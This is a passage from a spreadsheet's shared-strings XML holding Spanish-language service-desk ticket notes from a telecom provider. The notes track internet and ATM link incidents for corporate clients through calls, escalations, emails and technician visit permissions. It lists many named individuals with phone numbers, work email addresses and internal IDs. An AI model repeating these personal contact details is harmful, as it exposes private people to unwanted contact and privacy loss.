  </si>
  <si>
    <t>*/*/*/SE COMUNICA JUSTUS ALARCON PARA SOLICITAR AVANCES, SE LE INFORMA QUE EL SERVICIO ESTA OPERATIVO Y ESTABLE, LO QUE SI IDENTIFICAMOS ES QUE NO TIENE NINGÚN EQUIPO CONECTADO, INDICA QUE TODO ESTA CONECTADO EN EL LUGAR YA QUE ÉL ESTA ALLÍ VIENDOLO, SE PROCEDE A CONTACTAR A GESTOR SAMUEL.ESTRADAG	7745 ID: 2001785150 NO RESPONDE, VÍA SKYPE INDICA QUE TIENE OTRA LLAMADA, SE LLAMA A CNOC ID: 2001785284 NO RESPONDEN
SE ESCALA CON LÍDER KEVYN FONSECA 41284612 ID: 2001785903 INDICA QUE SE LLAME A MARLON.RAMOS EXT 4869 ID: 2001786398 NO RESPONDEN
*SE LE MARCA NUEVAMENTE A LÍDER KEVYN FONSECA ID: 2001786502 E INDICA QUE EXT DE SAMUEL YA SE LIBERÓ 7745 ID: 2001787693, SE TRASLADA LLAMADA Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUSTUS ALARCON AL 54138165 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO**
-ID 2001875609
**</t>
  </si>
  <si>
    <t>F4620496</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 17:24
PARA: MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C657 - LENTITU ENLACE INTERNET - CON ID 38300523
BUENAS TARDES ESTIMADO (A)
COMO PARTE DEL SEGUIMIENTO AL CASO SE VALIDA SERVICIO ACTIVO ALCANZABLE A NIVEL DE PING DE FORMA ESTABLE, CON SALIDA HACIA INTERNET (FIGURA 1).SE ADJUNTAN GRAFICAS DEL SERVICIO DONDE SE OBSERVA QUE NO SE HAN OBSERVADO EVENTUALIDADES. QUEDAMOS AL PENDIENTE. GRACIAS DE ANTEMANO</t>
  </si>
  <si>
    <t>*/*/*/ CON APOYO DE GESTOR, SE ENVÍAN LAS GRÁFICAS SOLICITADAS*/*/*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 18:04
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C657 - LENTITU ENLACE INTERNET - CON ID 38300523
BUENAS TARDES WALTER,
            DANDO SEGUIMIENTO A SU CASO, LE COMPARTO LAS GRÁFICAS SOLICITADAS A CONTINUACIÓN:
EL SERVICIO SE OBSERVA OPERATIVO TAL Y COMO SE MUESTRA EN LAS PRUEBAS COMPARTIDAS, SOLICITAMOS DE SU APOYO EN AUTORIZARNOS EL CIERRE DEL TICKET POR FAVOR.
QUEDAMOS ATENTOS A SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE DESEA GRÁFICAS DE PICOS DE CONSUMO Y ESTATUS, SE LE INDICA QUE CNOC RESPONDERÁ*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 17:43
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C657 - LENTITU ENLACE INTERNET - CON ID 38300523
BUENAS TARDES WALTER,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER AL ENVÍO DE LAS GRÁFICAS SOLICITADAS, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
-------------------------------
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 17:38
PARA: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;
ASUNTO: RE: C657 - LENTITU ENLACE INTERNET - CON ID 38300523
BUENA TARDE,  GRACIAS KANDY, FAVOR COMPARTIR GRAFICAS EN LAS CUALES SE PUEDA OBSERVAR PICOS DE CONSUMO Y SU ESTATUS.
SALUDOS,</t>
  </si>
  <si>
    <t>*/*/*/SE REALIZA ESCALACIÓN CON LÍDER KEVYN FONSECA 41284612 ID: 2001814416 SE SOLICITA APOYO PARA EL ENVÍO DE LAS GRAFICAS AL CLIENTE*/*/*/</t>
  </si>
  <si>
    <t>F4620500</t>
  </si>
  <si>
    <t>COORDINADA VISITA TÉCNICA PARA MAÑANA A PARTIR DE LAS 08:00AM, OPERACIONES REGIÓN ENTERADO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON HERNANDEZ  AL 55171151  NO RESPONDE ENVIA DIRECTO A BUZON DE VOZ|| SE INTENTARA LUEGO**
-ID 2001800015
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GILMAR ARROYO 41156310 SE TENIA EN LINEA A CLIENTE PERO CORTO LLAMADA || SE INTENTARA LUEGO **
-ID 2001807116
**</t>
  </si>
  <si>
    <t>F4620568</t>
  </si>
  <si>
    <t>CLIENE NO HA CONESTADO CORREO SE VUELVE A ENVIAR CORREO DE SEGUIMIENTO
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: VIERNES, 1 DE JULIO DE 2022 18:36PARA: KENNY ROBERT RIVERA JUAREZ &lt;KENNY.RIVERA@CLARO.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-766913##] : CAJEROS ATM ATM0507 CAIDA DE SERVICIO
BUENAS TARDES ESTIMADOS,
SOLICITO FAVOR SU APOYO BRINDANDO RESPUESTA AL CORREO QUE ANTECEDE.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CARLOS SOSA Y/O ERWIN CHOQUIN PARA CONFIRMAR EL TIEMPO INACTIVO Y AUTORIZAR BLOQUEO TEMPORAL DE SER NECESARIO, PRINCIPAL Y REDUNDANTE DOWN
KENNY ROBERT RIVERA JUAREZ
ESTIMADOS @CARLOS SOSA Y/O @ERWIN CHOQUIN,
EN SEGUIMIENTO AL ENLACE PARA EL ATM: ATM0507 NOS INFORMA PERSONAL DE MONITOREO 5B QUE ATM FUE RETIRADO DE FORMA TEMPORAL, SERIAN TAN AMABLES DE APOYARNOS INDICANDO CUANTO TIEMPO ESTARÍA FUERA ASÍ TAMBIÉN AUTORIZAR BLOQUEO TEMPORAL EN EL MONITOREO EL TIEMPO QUE ESTE RETIRADO.
QUEDO AL PENDIENTE
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>PERSONAL DE MONITOREO 5B INFORMA RETIRO TEMPORAL DE ATM
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 17:21
PARA: CARLOS FELIPE VELASQUEZ CRISTAL &lt;CARLOSF.VELASQUEZ@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66913##] : CAJEROS ATM ATM0507 CAIDA DE SERVICIO
BUENA TARDE  INFORMANDO QUE SE RETIRO DEL PUNTO  EL ATM TEMPORALMENTE.
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4620572</t>
  </si>
  <si>
    <t>SE TIENE A TEC EN LINEA ALBERTO TRUJILLO 58263017  ### INDICA QUE  ESTA SIGUIENDO LAS LINEAS.  ## SIGUE CABLEADO DEBIDO A QUE HAY VARIOS CABLES  SUELTOS/REVENTADOS - POR LO QUE TENDRA AVANCES EN 30 MINUTOS##VIVO</t>
  </si>
  <si>
    <t>PROGRAMADA VISITA TÉCNICA PARA MAÑANA A PARTIR DE LAS 07:00AM A SOLICITUD DE CLIENTE; ADICIONAL SE BRINDAN AVANCES DEL TICKET A ERICK SOMOZA/CLIENTE 30832131.
PERSONAL DE OPERACIONES METRO ENTERADOS</t>
  </si>
  <si>
    <t>SE LLAMA ERICK SOMOZA-30832131  SE TIENE EN ELINEA ##VIVO</t>
  </si>
  <si>
    <t>F4620575</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON LAS GRAFICAS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 9:27
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; NGAMEZ@BACCREDOMATIC.NI &lt;NGAMEZ@BACCREDOMATIC.NI&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ENLACE FO BAC_CASA_MATRIZ_INTERNET INTERMITENCIA
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*--*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOEL GAMEZ 88675716  MENCIONA QUE NO HA PRESENTADO PROBLEMA PERO SOLICITA LLAMADA PARA LAS 9:00 HRS
-ID 3001025987</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NOEL GAMEZ 88675716 MENCIONA QUE NO HA PRESENTADO PROBLEMA PERO SOLICITA LLAMADA PARA LAS  17 HRS
-ID 2001994238</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NOEL GAMEZ 88675716 MENCIONA QUE EL SERVICIO HA PERMANECIDO ESTABLE, SE LLAMARA A LAS  17:30
-ID 3001178552</t>
  </si>
  <si>
    <t>**SE LLAMO A CL NOEL GAMEZ  505 88675716 CONTESTA EL SEÑOR NERY CANALES QUIEN CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001900750
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NOEL GAMEZ  / 88675716 INDICA QUE AUN NO TIENE INTERNET || SE NOTIFICA A GESTOR**
-ID 2001800603
**</t>
  </si>
  <si>
    <t>SEGUIMIENTO A PARTIR DE LAS 10:00 HORAS//SE VALIDARA NUEVAMENTE, SE LE ENVIO CORREO A CLIENTE DETALLANDO QUE NO HAY INCONVENIENTES EN LA RED DE CLARO//SE LE ENVIA GRAFICAS  DETALLANDO QUE NO HAY PERDIDAS DE PAQUETES.
ELVYN ARIEL LOPEZ RECINOS
BUENA NOCHE ESTIMADO CLIENTE;
COMO SE CONVERSO VIA LLAMADA, SERVICIO A NIVEL DE LA RED DE CLARO SE ENCUENTRA OPERATIVO Y ESTABLE, POR LO QUE CONFIRMARA NUEVAMENTE EL DIA DE MAÑANA A LAS 10:00 HORAS,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOEL GAMEZ  / 88675716 MENCIONA QUE NO HA PRESENTADO PROBLEMA POR LO QUE SOLICITA LLAMADA A LAS 14:30
-ID 2001933747</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NOEL GAMEZ  88675716 QUIEN SOLICITA SE PUEDA MANTENER EN OBSERVACION EL SERVICIO Y VALIDAR EL FUNCIONAMIENTO A LAS 11:30
CLIENTE SOLICITA SE ENVIEN PRUEBAS A LAS 11:30 POR CORREO
-ID 2001900445</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 11:38
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; NGAMEZ@BACCREDOMATIC.NI &lt;NGAMEZ@BACCREDOMATIC.NI&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE ENLACE FO BAC_CASA_MATRIZ_INTERNET INTERMITENCIA
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE NOEL GAMEZ 88675716 MENCIONA QUE AUN NO LE HAN REPORTADO INCONVENIENTE CON EL SERVICIO PERO SOLICITA SEGUIMIENTO A LAS 14:30
-ID 3001087707</t>
  </si>
  <si>
    <t>F4620577</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, ANABELLA SALAZAR/BO TELERED INDICA QUE CLIENTE HARÁ SUS PRUEBAS POR 24 HORAS, PARA VALIDAR SI TODO OK, SE MANTENDRÁ EN WO PC, SE DARÁ SEGUIMIENTO MAÑANA A LAS 16:30 HORAS PARA VALIDAR EL CIERRE.
SE ESTABA LLEVANDO CON SD1139505 YA CERRADA.</t>
  </si>
  <si>
    <t>SEGUIMIENTO CON TÉCNICO ASIGNADO; ADICIONAL SE LLAMÓ/HABLÓ CON FERNANDO CULAJU CLIENTE 42162533 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE FERNANDO CULACJUC 42162533 CONFIRMA SERVICIO ESTABLE PERO SOLICITA QUE SE DEJE EN OBSERVACION 24 HRS **
-ID 2001803178 - 2001802981
**</t>
  </si>
  <si>
    <t>F4620578</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON RAMOS 78549471 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA A LAS 14:30
-ID 2001899124</t>
  </si>
  <si>
    <t>CLIENTE NELSON RAMOS 78549471 VALIDA QUE YA RECIBE Y GENERA LLAMADAS, PERO SOLICITA QUE SE CERTIFIQUE EL SERVICIO YA QUE EL PROBLEMA LE HA DADO CONSTANTEMENTE. SOLICITA VISITA TÉCNICA PARA MAÑANA A LAS 8 AM YA QUE SE RETIRAN A LAS 5 PM. DESDE VIVO</t>
  </si>
  <si>
    <t>F4620597</t>
  </si>
  <si>
    <t>SE HABLÓ CON FERNANDO AYALA/CLIENTE 58656674 Y SE LE INFORMA QUE SE LE ENVIÓ CORREO PARA TRAMITAR EL INGRESO DE TÉCNICOS A AGENCIA; INDICA QUE AL TENER LA AUTORIZACIÓN NOS RESPONDERÁ EL CORREO.</t>
  </si>
  <si>
    <t>EN COMUNICACION CON CLIENTE FERNANDO AYALA Y TECNICO DANIEL MONTENEGRO, SE VALIDA QUE ES NECESARIO LOS PERMISOS , CLIENTE  ESTARA GESTIONANDO PERMISOS
2001983085
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:06:00
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 14:31:25</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON ARDON  SE SOLICITA VALIDAR SI YA SE CUENTAN CON PERMISOS PARA PODER INGRESAR Y REPARAR FO, DE MOMENTO NO SE CUENTA CON AVANCES COMENTA QUE SE LE PUEDA LLAMAR EN 15 MINUTOS, TECNICO DANIEL MOMENTENGRO EN ESPERA DE LOS ACCESOS
[15:42] JUAN CARLOS LOPEZ SANCHEZ
3001003907
COLA:
NOMBRE: A: 58290491
NÚMERO: 58290491
DURACIÓN: 0:02:05
ESTADO: CONECTADA
DETALLES: 58290491
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 15:42:12</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE A LA ESPERA DE CONFIRMACION  DE ACCESOS
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 16:13
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SECCION OPERACION &lt;OINFORMA@INTERBANCO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;; RCABRERA@INTERBANCO.COM.GT &lt;RCABRERA@INTERBANCO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; EAYALA &lt;EAYALA@INTERBANCO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | 8200205T |BANCO INTERNACIONAL, S.A. . |KM. 14.5 RUTA AL PACIFICO, CENTRO DE DISTRIBUCION PIO LINDO VILLALOBOS GUATEMALA VILLA NUEVA
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO SOLICITAMOS DE SU APOYO EN VALIDAR SI FUE POSIBLE EL INGRESO DE PERSONA TÉCNICO A LAS INSTALACIONES DE PIO LINDO , DE ACUERDO A LO CONVERSADO CON EL SR. FERNANDO ES NECESARIO SOLICITAR ACCESOS A LA EMPRESA, TÉCNICOS EN SITIO SIGUEN ESPERANDO, VALIDAR SI ES POSIBLE EL INGRESO EL DÍA DE HOY, DE LO CONTRARIO SE REPROGRAMARÍA LA VISITA.
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON ARDON COMENTA QUE NO SE TIENEN LOS PERMISOS PARA LOS TECNICOS Y QUE SE ESTARA RESPONDIENDO CORREO, SE VALIDA UNA VISITA PARA EL DIA DE MAÑANA A LA ESPERA QUE CLIENTE AUTORICE INGRESOS
[17:06] JUAN CARLOS LOPEZ SANCHEZ
3001025845
COLA:
NOMBRE: A: 58290491
NÚMERO: 58290491
DURACIÓN: 0:02:42
ESTADO: CONECTADA
DETALLES: 58290491
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 17:06:32</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE FERNANDO COMETNA QUE YA ESTAN GESTIONANDO PERMISOS PARA PODER REPARAR FO, EN CUANTO SE TENGAN LOS PERMISOS AUTORIZADOS CLIENTE ESTARA RESPONDIENDO CORREO
2001987965
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 22773666
NÚMERO: 22773666
DURACIÓN: 0:02:25
ESTADO: ACD - ASIGNADO A: JUAN.LOPEZS
DETALLES: 22773666
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 29/06/2022 14:45:39</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, SE SOLICITA VALIDAR LOS PERMISOS PARA EL DIA DE MAÑANA
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 17:19
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; RONNY CABRERA &lt;RCABRERA@INTERBANCO.COM.GT&gt;; SECCION OPERACION &lt;OINFORMA@INTERBANCO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; ERICK FERNANDO AYALA &lt;EAYALA@INTERBANCO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTIÓN DE PERMISOS | 8200205T |BANCO INTERNACIONAL, S.A. . |KM. 14.5 RUTA AL PACIFICO, CENTRO DE DISTRIBUCION PIO LINDO VILLALOBOS GUATEMALA VILLA NUEVA
BUENA TARDE
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE REPORTADO SE PLATICÓ CON EL SR GERSON ARDÓN PARA COORDINAR VISITA EL DÍA DE MAÑANA EN CUANTO SE TENGAN LOS PERMISOS AUTORIZADOS, SOLICITAMOS QUE NOS PUEDAN INFORMAR CON DOS HORAS DE ANTICIPACIÓN PARA COORDINAR CON TÉCNICOS Y LLEGAR A LA HORA INDICADA.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON ARDON  58290491 MENCIONA QUE YA ESTAN AUTORIZADOS LOS PERMISOS, CLIENTE CONFIRMA QUE YA PUEDEN INGRESAR
-ID 3001150056</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS VASQUEZ 58656674 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001149752</t>
  </si>
  <si>
    <t>SE LLAM A ACLIENTE GERSON ARDON 58290491 MENCIONA QUE EL LOOS ESTARA ATENDIENDO, EL SE ENCUENTRA EN PR
-ID 3001151180</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON CARLOS COYOY/CLIENTE 58656674 Y SE LE PIDE APOYO CON EL CORREO PARA GESTIONAR EL INGRESO DE TÉCNICO A AGENCIA; INDICA QUE CONTESTARÁ AL TENER LA AUTORIZACIÓN.</t>
  </si>
  <si>
    <t>RE: GESTIÓN DE PERMISOS | 8200205T |BANCO INTERNACIONAL, S.A. . |KM. 14.5 RUTA AL PACIFICO, CENTRO DE DISTRIBUCION PIO LINDO VILLALOBOS GUATEMALA VILLA NUEVA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:VELDIN JANITZIO PALENCIA FLORES;OINFORMA@INTERBANCO.COM.GT;RCABRERA@INTERBANCO.COM.GT
CC:GRUPO N1;CLIENTESCORPORATIVOS
MAR 28/06/2022 17:38
BUENAS TARDES ESTIMADO CLIENTE ,
DANDOLE SEGUIMIENTO A LA SOLICITUD DEL CORREO ANTERIOR</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:30
PARA: OINFORMA@INTERBANCO.COM.GT &lt;OINFORMA@INTERBANCO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 8200205T |BANCO INTERNACIONAL, S.A. . |KM. 14.5 RUTA AL PACIFICO, CENTRO DE DISTRIBUCION PIO LINDO VILLALOBOS GUATEMALA VILLA NUEVA
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 8200205T  |BANCO INTERNACIONAL, S.A. . |KM. 14.5 RUTA AL PACIFICO, CENTRO DE DISTRIBUCION PIO LINDO VILLALOBOS GUATEMALA VILLA NUEVA
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNIC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HECTOR MISAEL RAMIREZ CARDONA                           710195            2249 23862 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE CON LA SIGUIENTE INFORMACIÓN, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, Y SE CONTESTA CORREO DE CLIENTE:
DE: SECCION OPERACION [MAILTO:OINFORMA@INTERBANCO.COM.GT]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 21:15
ASUNTO: RE: GESTIÓN DE PERMISOS | 8200205T |BANCO INTERNACIONAL, S.A. . |KM. 14.5 RUTA AL PACIFICO, CENTRO DE DISTRIBUCION PIO LINDO VILLALOBOS GUATEMALA VILLA NUEVA
BUENAS NOCHES GRACIAS POR EL SEGUIMIENTO, LOS PERMISOS ESTÁN SOLICITADOS, POR FAVOR INDICARLE AL PERSONAL TÉCNICO QUE SE PUEDE PRESENTAR EL DÍA DE MAÑANA A PARTIR DE LAS 13:00 HORAS, CUALQUIER CONSULTA ESTAMOS A LA ORDEN
SALUDOS¿
CARLOS ESTUARDO COYOY
CARLOS.COYOY@INTERBANCO.COM.GT
OPERACIONES IT Y MESA DE AYUDA
TEL. 1701 EXT. 2617
AVENIDA LA REFORMA 15-85 ZONA 10 TORRE INTERNACIONAL</t>
  </si>
  <si>
    <t>E LLAMA A CLIENTE GERSON ARDON 58290491 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001177464</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERSON ARDON 58290491 MENCIONA QUE AUN ESTAN GESTIONANDO LOS PERMISOS PARA PERSONAL TECNICO, CLIENTE NO BRINDA TIEMPO ESTIMADO PARA DEVOLVER LA LLAMADA
-ID 3001017901</t>
  </si>
  <si>
    <t>F4620603</t>
  </si>
  <si>
    <t>###SE ESTA GESTIONANDO AUN POR EL CLIENTE CONTACTAR AL ENCARGADO PARA QUE SE GESTIONE LA VISITA ##
DE: CHRISTIAN ANDRES ORDOÑEZ ROBLES &lt;CHRISTIAN.ORDONEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 17:06
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: ADMIN.NMISCORPORATIVO &lt;ADMIN.NMISCORPORATIVO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD GENERAR TICKET OPERADORA DE TIENDAS S.A.
BUENA TARDE JONATHAN;
